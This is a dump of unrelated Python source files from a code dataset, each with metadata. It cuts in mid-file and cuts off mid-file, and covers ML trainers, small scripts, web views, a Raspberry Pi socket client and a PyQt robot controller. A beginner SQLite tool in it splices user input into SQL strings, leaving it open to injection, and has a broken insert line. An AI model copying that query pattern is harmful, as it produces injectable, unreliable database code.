predicted_labels=label_output_inst[:box_number_inst],\n predicted_boxes=box_output_inst[:box_number_inst],\n labels=label_target_inst[:box_number_inst],\n boxes=box_target_inst[:box_number_inst],\n key_number=key_number_inst)\n cover_percent = coverage(box_output_inst[:box_number_inst])\n cover_percent_iteration.append(cover_percent)\n iou_score_iteration.append(iou_score_inst)\n iou_key_score_iteration.append(iou_key_score_inst)\n\n item_number = torch.sum((key_mask[0] + other_mask[0]), dim=-1)\n # print(\"Predicted boxes:\", box_output[0][:min(item_number.item(), 8)])\n # print(\"Target boxes:\", boxes[0][:min(item_number.item(), 8)])\n\n avg_cover = sum(cover_percent_iteration) / len(cover_percent_iteration)\n avg_iou = sum(iou_score_iteration) / len(iou_score_iteration)\n avg_iou_key = sum(iou_key_score_iteration) / len(iou_key_score_iteration)\n total_iou.append(avg_iou)\n total_key_iou.append(avg_iou_key)\n total_cover.append(avg_cover)\n print_divider()\n # print(\"Iteration: {}, average IoU_score: {}, average key IoU_score: {}, average coverage: {}\".format(\n # iteration, avg_iou, avg_iou_key, avg_cover))\n avg_total_iou = sum(total_iou) / len(total_iou)\n avg_total_key_iou = sum(total_key_iou) / len(total_key_iou)\n avg_total_cover = sum(total_cover) / len(total_cover)\n print(\"Average IoU_score: {}, Average key IoU_score: {}, Average coverage: {}\".format(avg_total_iou,\n avg_total_key_iou,\n avg_total_cover))\n return avg_total_iou, avg_total_key_iou, avg_total_cover\n\n def save(self, model, path):\n print('Model saved to path: {}'.format(path))\n torch.save(model.state_dict(), path)\n\n def load(self, model, path):\n print('Model loaded from path: {}'.format(path))\n model.load_state_dict(torch.load(path))\n\n\nif __name__ == '__main__':\n a = torch.tensor([1, 2, 3, 4])\n print(label2word(a))\n","sub_path":"trainers/trainer_gan.py","file_name":"trainer_gan.py","file_ext":"py","file_size_in_byte":21607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"510182088","text":"def hows_the_x(traffic, weather, fitness, bike, company):\n '''A simple rating scale which takes five variables and returns the average accompanied by a contrived summary.\n May easily be adapted to suit your fancy.'''\n\n traffic = int(traffic)\n weather = int(weather)\n fitness = int(fitness)\n bike = int(bike)\n company = int(company)\n\n t = traffic + weather + fitness + bike + company\n t = int(t / .5)\n ts = str(t)\n\n if t <= 0:\n return '\\nThat\\'s a ' + ts + ' % bike ride. You\\'re lucky to still be alive! Go and have a lie down.'\n elif t > 0 and t <= 10:\n return '\\nThat\\'s a ' + ts + ' % bike ride. Blimy \\'O\\' Reily! Things can only get better.'\n elif t > 10 and t <= 20:\n return '\\nThat\\'s a ' + ts + ' % bike ride. Told you things would get better'\n elif t > 20 and t <= 30:\n return '\\nThat\\'s a ' + ts + ' % bike ride. The toughest part is getting started.'\n elif t > 30 and t <= 40:\n return '\\nThat\\'s a ' + ts + ' % bike ride. Well done for having a go.'\n elif t > 40 and t <= 50:\n return '\\nThat\\'s a ' + ts + ' % bike ride. Nearly half way to enjoying yourself! Keep at it.'\n elif t > 50 and t <= 60:\n return '\\nThat\\'s a ' + ts + ' % bike ride. More good than bad.'\n elif t > 60 and t <= 70:\n return '\\nThat\\'s a ' + ts + ' % bike ride. Don\\'t take it for granted. Keep up the good work.'\n elif t > 70 and t <= 80:\n return '\\nThat\\'s a ' + ts + ' % bike ride. Lot\\'s of positive gains being felt.'\n elif t > 80 and t <= 90:\n return '\\nThat\\'s a ' + ts + ' % bike ride. Why did you stop?'\n elif t > 90 and t <= 100:\n return '\\nThat\\'s a ' + ts + ' % bike ride. You crushed it peloton!.'\n else:\n return '\\nThat\\'s a ' + ts + ' % bike ride. You must be tripping!'\n\n\nprint('How was your bike ride? Rate the following five aspects of your ride. 0 (the worst) 10 (the best).')\n\n\nprint(hows_the_x(input('\\nTraffic: '), input('\\nWeather: '), input('\\nFitness: '),\n input('\\nBike: '),\n input('\\nCompany: ')))\n","sub_path":"bike_ride.py","file_name":"bike_ride.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"282934970","text":"import sqlite3\nimport sys\nimport time\n ### START Of SQLITE SETUP ### Need to place this into the sqlite functions as a peramerter..... so that it can be moduale\n \nconn = sqlite3.connect('database.db')\nc = conn.cursor()\n ### END OF SQLITE SETUP ###\nloop_toggle = True \n#user_input = input(\":\")\n #user input starting resquest create this into user request function\ndef string_analize(string):\n splited_list = string.split()\n print(splited_list)\ndef User_input(text):\n user_input = input(text)\n print(user_input)\n return(user_input)\n \ndef input_check(the_input,text):\n if str(the_input) == text:\n return True\n print(\"True\")\n else:\n return False\n print(\"Returned false\")\n\ndef delete_table():\n new_input = input(\"Name of Table? \")\n c.execute(\" drop table if exists %s\" %new_input)\n print(\"droped table\")\n\ndef create_table():\n new_input = input(\"table name? \")\n cmd = '''CREATE TABLE IF NOT EXISTS %s (word text) ''' % (new_input)\n print(cmd)\n c.execute(cmd)\n print(\"Created Table called %s\" % (new_input))\n\ndef print_table():\n tableListQuery = \"SELECT name FROM sqlite_master WHERE type='table' ORDER BY Name\"\n c.execute(tableListQuery)\n for tables in c:\n print(tables)\n\ndef updateDb(file_name,table_name):\n file = open(file_name, 'r')\n for name in file: \n fixed_name = name.rstrip()\n c.execute(\"select word from ? where word=?\", (table_name,fixed_name,))\n data = c.fetchone()\n if data == None:\n print ('not found')\n c.execute('insert into %s values(\"%s\")'%table_name %fixed_name)\n print('Added word named %s' %name)\n else:\n print ('found')\n file.close()\n\ndef user_input_cmd(Input):\n the_input = Input\n user_input = the_input\n if input_check(the_input,\"table check\"):\n new_input=User_input(\"What is the name of the table to test? \")\n stmt = \"SELECT name FROM sqlite_master WHERE type='table' AND name='%s'\" %new_input\n c.execute(stmt)\n result = c.fetchone()\n if result:\n print(\"YES\")# there is a table named \"tableName\"\n else:\n print(\"NO\")# there are no tables named \"tableName\"\n elif input_check(the_input,\"update\"):\n file_name = input(\"Name of file? \")\n table_name = input(\"Name of Table? \")\n \n updateDb(file_name,table_name)\n elif input_check(the_input,\"create table\"):\n new_input = input(\"table name? \")\n if input_check(new_input,\"quit\") == False:\n cmd = '''CREATE TABLE IF NOT EXISTS %s (word text) ''' % (new_input)\n print(cmd)\n c.execute(cmd)\n print(\"Created Table called %s\" % (new_input))\n \n elif input_check(the_input,\"delete table\"):\n delete_table()\n \n elif input_check(the_input,\"list tables\"):\n print_table()\n \n elif input_check(the_input,\"quit\"):\n print(\"quiting....\")\n conn.commit() # these need to be in the functions....\n conn.close()\n sys.exit() \n elif input_check(the_input,\"get time\"):\n print(time.localtime())\n \n \nwhile True:\n the_input = input(\":\")\n #(the_input)\n user_input_cmd(the_input)\n \n \n \n #testing if the rows reseaved the date correctly\n \n\n\n ### SQLITE REFRANCE CODE ###\n\n # Create table\n#c.execute('''CREATE TABLE words\n #(word text, is_noun text, is_verb text, adverbs text, adjectives text)''')\n\n # Insert a row of data\n#c.execute(\"INSERT INTO words VALUES ('time','Yes','No','No','No')\")\n #remoe a row of data\n#c.execute(\"DELETE FROM words WHERE word=?\", (\"time\",))\n #removes table\n#c.execute(\"DROP TABLE words\" )\n # Save (commit) the changes\n#conn.commit()\n#cur.execute(\"UPDATE Cars SET Price=? WHERE Id=?\", (uPrice, uId)) change data in row\n # We can also close the connection if we are done with it.\n # Just be sure any changes have been committed or they will be lost.\n#c.execute(\"alter table table_name add column '%s' 'float'\" % author)","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"159663171","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# @Time : 2021/3/14 8:09\n# @Author : john\n# @File : c09_03_rlock.py\n\nimport threading\nimport time\n\n# Lock 普通锁不可以嵌套, RLock可以嵌套\n\nmutex = threading.RLock()\n\n\nclass MyThread(threading.Thread):\n def run(self):\n if mutex.acquire(1):\n print(f'thread {self.name} get mutex')\n time.sleep(1)\n mutex.acquire()\n mutex.release()\n mutex.release()\n\n\nif __name__ == '__main__':\n for i in range(10):\n t = MyThread()\n t.start()","sub_path":"week11/c09_03_rlock.py","file_name":"c09_03_rlock.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"254484889","text":"import math\nimport numpy as np\nimport random as rand\n\n\ndef sigmoid(x):\n\ttry:\n\t\treturn 1 / (1 + math.exp(-x))\n\texcept:\n\t\treturn 0\n\ndef dsigmoid(y):\n\treturn y * (1 - y)\n\nclass FeedForward:\n\tdef __init__(self, input_size, hidden_size, output_size, lr):\n\t\tself.input_size = input_size\n\t\tself.hidden_size = hidden_size\n\t\tself.output_size = output_size\n\t\tself.lr = lr\n\n\t\tself.weights_ih = np.random.rand(hidden_size, input_size) * 2 - 1\n\t\tself.weights_ho = np.random.rand(output_size, hidden_size) * 2 - 1\n\t\tself.bias_h = np.random.rand(hidden_size, 1)\n\t\tself.bias_o = np.random.rand(output_size, 1)\n\n\n\tdef __str__(self):\n\t\treturn 'FeedForward: ([%d->%d->%d], %f)' %(self.input_size, self.hidden_size, self.output_size, self.lr)\n\n\n\tdef predict(self, input):\n\t\tif not self.is_valid_input(input):\n\t\t\treturn None\n\n\t\tinput = np.asmatrix(input).transpose()\n\t\thidden = self.weights_ih * input\n\t\thidden += self.bias_h\n\t\tself.map_matrix(hidden, sigmoid)\n\n\t\toutput = self.weights_ho * hidden\n\t\toutput += self.bias_o\n\t\tself.map_matrix(output, sigmoid)\n\t\treturn np.asarray(output).reshape(-1)\n\n\n\tdef train(self, input, target):\n\t\tinput = np.asmatrix(input).transpose()\n\t\ttarget = np.asmatrix(target).transpose()\n\n\t\thidden = self.weights_ih * input\n\t\thidden += self.bias_h\n\t\thidden = self.map_matrix(hidden, sigmoid)\n\n\t\toutput = self.weights_ho * hidden\n\t\toutput += self.bias_o\n\t\toutput = self.map_matrix(output, sigmoid)\n\t\toutput_err = target - output\n\n\t\twho_t = np.transpose(self.weights_ho)\n\t\thidden_err = who_t * output_err\n\n\t\toutput_grad = self.map_matrix(output, sigmoid)\n\t\tfor row in range(output_grad.shape[0]):\n\t\t\tfor col in range(output_grad.shape[1]):\n\t\t\t\toutput_grad[row][col] *= output_err[row][col]\n\t\t\n\t\toutput_grad *= self.lr\n\n\t\thidden_grad = self.map_matrix(hidden, sigmoid)\n\t\tfor row in range(hidden_grad.shape[0]):\n\t\t\tfor col in range(hidden_grad.shape[1]):\n\t\t\t\thidden_grad[row][col] *= hidden_err[row][col]\n\t\t\t\n\t\thidden_grad *= self.lr\n\n\t\thidden_t = np.transpose(hidden)\n\t\toutput_delta_w = output_grad * hidden_t\n\t\tself.weights_ho += output_delta_w\n\t\tself.bias_o += output_grad\n\n\t\tinputs_t = np.transpose(input)\n\t\thidden_delta_w = hidden_grad * inputs_t\n\t\tself.weights_ih += hidden_delta_w\n\t\tself.bias_h += hidden_grad\n\n\n\tdef is_valid_input(self, input):\n\t\tif type(input) != type(np.array([])):\n\t\t\treturn False\n\n\t\tif len(input) != self.input_size:\n\t\t\treturn False\n\n\t\treturn True\n\n\n\tdef is_valid_target(self, target):\n\t\tif type(target) != type(np.array([])):\n\t\t\treturn False\n\t\t\n\t\tif len(target) != self.output_size:\n\t\t\treturn False\n\t\t\n\t\treturn True\n\n\n\tdef map_matrix(self, matrix, func):\n\t\tfor row in range(matrix.shape[0]):\n\t\t\tfor col in range(matrix.shape[1]):\n\t\t\t\tmatrix[row][col] = func(matrix[row][col])\n\t\t\n\t\treturn matrix\n","sub_path":"simplenn/feedforward.py","file_name":"feedforward.py","file_ext":"py","file_size_in_byte":2728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"240635393","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n\nfrom flask import g, redirect, render_template, request, url_for\nfrom flask.ext.babel import gettext\nfrom sqlalchemy.sql.expression import or_\n\nfrom models.bill import Bill\nfrom models.bill_feed import BillFeed\nfrom models.feed import Feed\nfrom models.keyword import Keyword\nfrom models.person import Person\nfrom utils.jinja import breadcrumb, jsonify\nfrom utils.paginate import MoreQuery\n\n\ndef register(app):\n\n app.views['mypage'] = 'mypage'\n\n more = MoreQuery(Feed, 'mypage_feeds', 'desc', 'feeds')\n\n @app.route('/mypage/', methods=['GET'])\n @breadcrumb(app)\n def mypage():\n if g.user.is_anonymous():\n return redirect(url_for('login'))\n\n data = more.query(my_feeds())\n return render_template('mypage.html', **data)\n\n @app.route('/mypage/feeds', methods=['GET'])\n def mypage_feeds():\n if g.user.is_anonymous():\n return redirect(url_for('login'))\n\n data = more.query(my_feeds(), _from=request.args.get('before', None))\n data['html'] = render_template('feeds.html', **data)\n del data['feeds']\n return jsonify(data)\n\n\ndef my_feeds():\n feeds = Feed.query\\\n .with_polymorphic('*')\\\n .join(BillFeed.bill)\\\n .outerjoin(Bill.cosponsors)\\\n .outerjoin(Bill.keywords)\\\n .filter(or_(\n Keyword.id.in_(k.id for k in g.user.favorite_keywords),\n Person.id.in_(p.id for p in g.user.favorite_people),\n ))\\\n .order_by(Feed.id.desc())\n return feeds\n\n","sub_path":"views/mypage.py","file_name":"mypage.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"230045815","text":"###############################################################################\r\n## Author: Team Supply Bot\r\n## Edition: eYRC 2019-20\r\n## Instructions: Do Not modify the basic skeletal structure of given APIs!!!\r\n###############################################################################\r\n\r\n\r\n######################\r\n## Essential libraries\r\n######################\r\nimport cv2\r\nimport numpy as np\r\nimport os\r\nimport math\r\nimport csv\r\n\r\n\r\n\r\n\r\n########################################################################\r\n## using os to generalise Input-Output\r\n########################################################################\r\ncodes_folder_path = os.path.abspath('.')\r\nimages_folder_path = os.path.abspath(os.path.join('..', 'Images'))\r\ngenerated_folder_path = os.path.abspath(os.path.join('..', 'Generated'))\r\n\r\n\r\n\r\n\r\n############################################\r\n## Build your algorithm in this function\r\n## ip_image: is the array of the input image\r\n## imshow helps you view that you have loaded\r\n## the corresponding image\r\n############################################\r\ndef process(ip_image):\r\n ###########################\r\n ## Your Code goes here\r\n ## placeholder image\r\n sector_image = np.ones(ip_image.shape[:2],np.uint8)*255\r\n ## check value is white or not\r\n print(sector_image[0,0])\r\n img_gray = cv2.cvtColor(ip_image, cv2.COLOR_BGR2GRAY)\r\n ret,thresh = cv2.threshold(img_gray,254,255,cv2.THRESH_BINARY)\r\n contours, hierarchy = cv2.findContours(thresh,cv2.RETR_TREE,cv2.CHAIN_APPROX_NONE)\r\n\r\n #Check if its 2 or 3.\r\n rows, cols = ip_image.shape[:2]\r\n center_x, center_y = rows//2, cols//2\r\n matrix1 = (contours[2])[0]\r\n matrix2 = (contours[3])[0] \r\n dist1 = math.sqrt((matrix1[0, 0] - center_x)**2 + (matrix1[0, 1] - center_y)**2)\r\n dist2 = math.sqrt((matrix2[0, 0] - center_x)**2 + (matrix2[0, 1] - center_y)**2)\r\n if dist1 > dist2:\r\n req_matrix = 2\r\n else:\r\n req_matrix = 3\r\n\r\n cimg = np.ones_like(img_gray)*255\r\n print(cimg)\r\n cv2.drawContours(cimg, contours, req_matrix, color=0, thickness=-1)\r\n sector_image = cimg\r\n ###########################\r\n cv2.imshow(\"window\", sector_image)\r\n cv2.waitKey(0);\r\n return sector_image\r\n\r\n\r\n\r\n\r\n \r\n####################################################################\r\n## The main program which provides read in input of one image at a\r\n## time to process function in which you will code your generalized\r\n## output computing code\r\n## Do not modify this code!!!\r\n####################################################################\r\ndef main():\r\n ################################################################\r\n ## variable declarations\r\n ################################################################\r\n i = 1\r\n ## Reading 1 image at a time from the Images folder\r\n for image_name in os.listdir(images_folder_path):\r\n ## verifying name of image\r\n print(image_name)\r\n ## reading in image \r\n ip_image = cv2.imread(images_folder_path+\"/\"+image_name)\r\n ## verifying image has content\r\n print(ip_image.shape)\r\n ## passing read in image to process function\r\n sector_image = process(ip_image)\r\n ## saving the output in an image of said name in the Generated folder\r\n cv2.imwrite(generated_folder_path+\"/\"+\"image_\"+str(i)+\"_fill_in.png\", sector_image)\r\n i+=1\r\n\r\n\r\n \r\n\r\n############################################################################################\r\n## main function\r\n############################################################################################\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"task1#sb/Task1.2/Codes/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"324639416","text":"#!/usr/bin/env python3\n\nimport socket\nfrom ControlSenseHat import ControlSH\n\nclass SocketClient:\n\n\tdef __init__(self, host, port):\n\t\tself.host = host\n\t\tself.port = port\n\t\tself.conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\t\tself.conn.connect((host, port))\n\t\tself.closed = False\n\n\n\tdef write(self, message, eenheid=None):\n\t\tif eenheid is not None:\n\t\t\tmessage = message + str(eenheid)\n\n\t\tmessage = str(message) + '\\n'\n\t\tself.conn.sendall(bytes(message, encoding=\"ascii\"))\n\n\t\tprint('bericht verzonden ' + message)\n\n\n\tdef receive(self):\n\t\tdata = self.conn.recv(1024)\n\t\tprint('Received: ', data.decode('utf-8'))\n\n\t\tif data == b'exit\\r\\n':\n\t\t\tself.conn.close()\n\t\t\tself.closed = True\n\n\t\telif data == b'gt\\r\\n':\n\t\t\tself.write(ControlSH.getTemperature())\n\n\t\telif data == b'gh\\r\\n':\n\t\t\tself.write(ControlSH.getHumidity())\n\n\t\telif data == b'gp\\r\\n':\n\t\t\tself.write(ControlSH.getPressure())\n\n\t\telif data == b'sv\\r\\n':\n\t\t\tControlSH.setVerwarming()\n\t\t\tself.write('Verwarming aangezet')\n\n\t\telif data == b'uv\\r\\n':\n\t\t\tControlSH.unsetVerwarming()\n\t\t\tself.write('Verwarming uitgezet')\n\n\t\telif data == b'sl\\r\\n':\n\t\t\tControlSH.setLicht()\n\t\t\tself.write('Licht aangezet')\n\n\t\telif data == b'ul\\r\\n':\n\t\t\tControlSH.unsetLicht()\n\t\t\tself.write('Licht uitgezet')\n\t\t\t\n\n\tdef getClosed(self):\n\t\treturn self.closed\n\n\ndef main():\n\twhile True:\n\t\ttry:\n\t\t\tsocket1 = SocketClient('192.168.178.42', 6369)\n\t\t\t\n\t\t\twhile socket1.getClosed() != True:\n\t\t\t\tsocket1.receive()\n\t\texcept (ConnectionResetError, TimeoutError) as e:\n\t\t\tprint(e)\n\t\t\tcontinue\n\nif __name__ == '__main__':\n main()\n\t\n\n\t\t\t\n\t\t\n\t\t\n","sub_path":"RPi_Domotica/Python/TCP_Client.py","file_name":"TCP_Client.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"216406239","text":"\"\"\"Admin_Projects URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.10/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url\n\nfrom curr import views\nfrom curr import views_2\n\nurlpatterns = [\n \n url(r'^$', views.index, name='curr_index'),\n \n #20190528_104616\n url(r'^views_2/$', views_2.index, name='curr_index_2'),\n \n url(r'^updown_patterns/$', views.updown_patterns, name='updown_patterns'),\n \n url(r'^exec_updown_patterns/$', views.exec_updown_patterns, name='exec_updown_patterns'),\n \n url(r'^correlations/$', views.correlations, name='correlations'),\n \n url(r'^exec_correlations/$', views.exec_correlations, name='exec_correlations'),\n \n url(r'^basics/$', views.basics, name='basics'),\n \n url(r'^gen_peak_data/$', views.gen_peak_data, name='gen_peak_data'),\n \n url(r'^exec_Gen_PeakData/$', views.exec_Gen_PeakData, name='exec_Gen_PeakData'),\n \n url(r'^testers/$', views.testers, name='testers'),\n \n url(r'^tester_BuyUps_SellLows/$', views.tester_BuyUps_SellLows, name='tester_BuyUps_SellLows'),\n \n #20190528_104840\n url(r'^views_2/tester_BuyUps_SellLows/$', views_2.tester_BuyUps_SellLows, name='tester_BuyUps_SellLows_2'),\n \n url(r'^exec_Tester_BuyUps_SellLows/$', views.exec_Tester_BuyUps_SellLows, name='exec_Tester_BuyUps_SellLows'),\n \n # 20180918_134024\n url(r'^tester_BuyUps_SellLows__V2/$', views.tester_BuyUps_SellLows__V2, name='tester_BuyUps_SellLows__V2'),\n \n# url(r'^error/$', views.error, name='error'),\n \n \n]\n","sub_path":"prog/D-7/2_2/VIRTUAL/Admin_Projects/curr/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"160431864","text":"import nltk.corpus\nimport nltk.tokenize.punkt\nimport nltk.stem.snowball\nfrom nltk.corpus import wordnet\nimport string\nfrom nltk.tokenize import WordPunctTokenizer\n\n\n# refer article: https://bommaritollc.com/2014/06/12/fuzzy-match-sentences-python/\n# Get default English stopwords and extend with punctuation\nstopwords = nltk.corpus.stopwords.words('english')\nstopwords.extend(string.punctuation)\nstopwords.append('')\n\n\ndef get_wordnet_pos(pos_tag):\n if pos_tag[1].startswith('J'):\n return (pos_tag[0], wordnet.ADJ)\n elif pos_tag[1].startswith('V'):\n return (pos_tag[0], wordnet.VERB)\n elif pos_tag[1].startswith('N'):\n return (pos_tag[0], wordnet.NOUN)\n elif pos_tag[1].startswith('R'):\n return (pos_tag[0], wordnet.ADV)\n else:\n return (pos_tag[0], wordnet.NOUN)\n\n\n# Create tokenizer and stemmer\ntokenizer = WordPunctTokenizer()\nlemmatizer = nltk.stem.wordnet.WordNetLemmatizer()\n\n\ndef lemma_match_jaccard_index(a, b):\n \"\"\"Check if a and b are matches.\"\"\"\n pos_a = map(get_wordnet_pos, nltk.pos_tag(tokenizer.tokenize(a)))\n pos_b = map(get_wordnet_pos, nltk.pos_tag(tokenizer.tokenize(b)))\n lemmae_a = [lemmatizer.lemmatize(token.lower().strip(string.punctuation), pos) for token, pos in pos_a \\\n if token.lower().strip(string.punctuation) not in stopwords]\n lemmae_b = [lemmatizer.lemmatize(token.lower().strip(string.punctuation), pos) for token, pos in pos_b \\\n if token.lower().strip(string.punctuation) not in stopwords]\n index = len(set(lemmae_a).intersection(set(lemmae_b)))/float(len(set(lemmae_a).union(set(lemmae_b))))\n return index\n\n","sub_path":"LemmaSentenceMatcher_JaccardIndex.py","file_name":"LemmaSentenceMatcher_JaccardIndex.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"382559907","text":"import os,sys\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))\nsys.path.append(BASE_DIR)\nfrom template.HTMLTestRunner_PY3 import HTMLTestRunner\nimport unittest\nimport time\n\n# 指定测试用例为当前文件夹下的 test_case 目录\ntest_dir = './tests'\ndiscover = unittest.defaultTestLoader.discover(test_dir, pattern='test_*.py')\n\n\nif __name__ == \"__main__\":\n\n now = time.strftime(\"%Y-%m-%d %H_%M_%S\")\n filename = './report/' + now + '_result.html'\n fp = open(filename, 'wb')\n runner = HTMLTestRunner(stream=fp,\n title='测试报告',\n description='报告详细如下: ')\n runner.run(discover)\n fp.close()","sub_path":"manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"25663086","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass ANetwork(nn.Module): \n def __init__(self, state_size, action_size, seed, h1_size = 256, h2_size = 256):\n super(ANetwork, self).__init__()\n self.seed = torch.manual_seed(seed) # Random seed\n self.action_size = action_size\n self.state_size = state_size\n \n self.fc_layer1 = nn.Linear(state_size, h1_size)\n self.fc_layer2 = nn.Linear(h1_size, h2_size)\n self.fc_layer3 = nn.Linear(h2_size, action_size)\n \n\n def forward(self, state):\n x = F.relu(self.fc_layer1(state))\n x = F.relu(self.fc_layer2(x))\n return F.softmax(self.fc_layer3(x), dim = 1)\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"500799505","text":"# By Martin Rioux -- martin.rioux2@gmail.com\n# To use as you wish with proper credit!\n\n\ndef specialKeyAction(qt, e, state):\n if e.key() == QtCore.Qt.Key_Escape:\n qt.close()\n\n # THIS SECTION IS USED TO BIND KEY AND STATE TO SEND SERIAL DATA\n if e.key() == QtCore.Qt.Key_W and state == \"pressed\":\n qt.sendSerialData(\"PW\")\n if e.key() == QtCore.Qt.Key_W and state == \"released\":\n qt.sendSerialData(\"RW\")\n if e.key() == QtCore.Qt.Key_A and state == \"pressed\":\n qt.sendSerialData(\"PA\")\n if e.key() == QtCore.Qt.Key_A and state == \"released\":\n qt.sendSerialData(\"RA\")\n if e.key() == QtCore.Qt.Key_S and state == \"pressed\":\n qt.sendSerialData(\"PS\")\n if e.key() == QtCore.Qt.Key_S and state == \"released\":\n qt.sendSerialData(\"RS\")\n if e.key() == QtCore.Qt.Key_D and state == \"pressed\":\n qt.sendSerialData(\"PD\")\n if e.key() == QtCore.Qt.Key_D and state == \"released\":\n qt.sendSerialData(\"RD\")\n if e.key() == QtCore.Qt.Key_I and state == \"pressed\":\n qt.sendSerialData(\"PI\")\n if e.key() == QtCore.Qt.Key_I and state == \"released\":\n qt.sendSerialData(\"RI\")\n if e.key() == QtCore.Qt.Key_J and state == \"pressed\":\n qt.sendSerialData(\"PJ\")\n if e.key() == QtCore.Qt.Key_J and state == \"released\":\n qt.sendSerialData(\"RJ\")\n if e.key() == QtCore.Qt.Key_K and state == \"pressed\":\n qt.sendSerialData(\"PK\")\n if e.key() == QtCore.Qt.Key_K and state == \"released\":\n qt.sendSerialData(\"RK\")\n if e.key() == QtCore.Qt.Key_L and state == \"pressed\":\n qt.sendSerialData(\"PL\")\n if e.key() == QtCore.Qt.Key_L and state == \"released\":\n qt.sendSerialData(\"RL\")\n\n if e.key() == QtCore.Qt.Key_1 and state == \"pressed\":\n qt.sendSerialData(\"PB1\")\n if e.key() == QtCore.Qt.Key_2 and state == \"pressed\":\n qt.sendSerialData(\"PB2\")\n if e.key() == QtCore.Qt.Key_7 and state == \"pressed\":\n qt.sendSerialData(\"PB7\")\n if e.key() == QtCore.Qt.Key_8 and state == \"pressed\":\n qt.sendSerialData(\"PB8\")\n\n if e.key() == QtCore.Qt.Key_G and state == \"pressed\":\n qt.sendSerialData(\"PG\")\n\n if e.key() == QtCore.Qt.Key_T and state == \"pressed\":\n qt.sendSerialData(\"PT\")\n if e.key() == QtCore.Qt.Key_T and state == \"released\":\n qt.sendSerialData(\"RT\")\n\n if e.key() == QtCore.Qt.Key_B and state == \"pressed\":\n qt.sendSerialData(\"PB\")\n if e.key() == QtCore.Qt.Key_B and state == \"released\":\n qt.sendSerialData(\"RB\")\n if e.key() == QtCore.Qt.Key_N and state == \"pressed\":\n qt.sendSerialData(\"PN\")\n if e.key() == QtCore.Qt.Key_N and state == \"released\":\n qt.sendSerialData(\"RN\")\n if e.key() == QtCore.Qt.Key_M and state == \"pressed\":\n qt.sendSerialData(\"PM\")\n if e.key() == QtCore.Qt.Key_M and state == \"released\":\n qt.sendSerialData(\"RM\")\n\n\n if e.key() == QtCore.Qt.Key_H and state == \"pressed\":\n qt.sendSerialData(\"PH\")\n if e.key() == QtCore.Qt.Key_H and state == \"released\":\n qt.sendSerialData(\"RH\")\n\n if e.key() == QtCore.Qt.Key_0:\n qt.sendSerialData(\"STOP\")\n\n\n \n\ndef receivedDataHandler(qt, data):\n data = data.rstrip()\n\n # if data == \"YO\":\n # qt.total += (time.time()*1000 - qt.timer)\n # qt.qte += 1\n # print(qt.total/qt.qte)\n\n\n\n\n\n\n\n\n\n\nDEBUG_MODE = False\n# REAL STUFF\n\n\nimport sys, threading, time\nfrom PyQt4 import QtGui, QtCore\nfrom serial import Serial\nimport socket\n\n\nclass RoboControl(QtGui.QWidget):\n\n def __init__(self):\n super(RoboControl, self).__init__()\n self.timer = 0\n self.total = 0\n self.qte = 0\n self.PRESSED_KEYS = set() # key currently pressed\n self.COMMAND_TO_SEND = []\n self.SERIAL_DATA_SENT = []\n self.SERIAL_DATA_RECEIVED = []\n self.SERIAL_INPUT = \"\"\n self.CONNECTED = DEBUG_MODE\n self.COM_MODE = \"SOCKET\" #SOCKET or SERIAL\n # GENERAL CONFIG\n self.READ_TIMEOUT = 0.0002 # 0.002 for serial, 0.005 socket or more?, finally 0.0002 is good?\n # IF SERIAL MODE\n self.DEVICE = \"/dev/ttyACM0\"\n self.BAUD = 115200\n # IF SOCKET MODE\n self.ADDRESS = \"192.168.8.1\"\n self.RECV_BUFFER = 1024\n self.PORT = 7777\n self.THREAD_SLEEP = 0.0002\n self.initUI()\n self.displayThreadData()\n\n self.running = 1\n self.thread1 = threading.Thread(target=self.serialThread)\n self.thread1.start()\n\n def connectToArduino(self):\n\n self.total = 0\n self.qte = 0\n if self.CONNECTED:\n self.disconnectArduino()\n return \n if self.COM_MODE == \"SERIAL\":\n try:\n self.DEVICE = str(self.deviceInput.text())\n self.BAUD = int(self.baudInput.text())\n 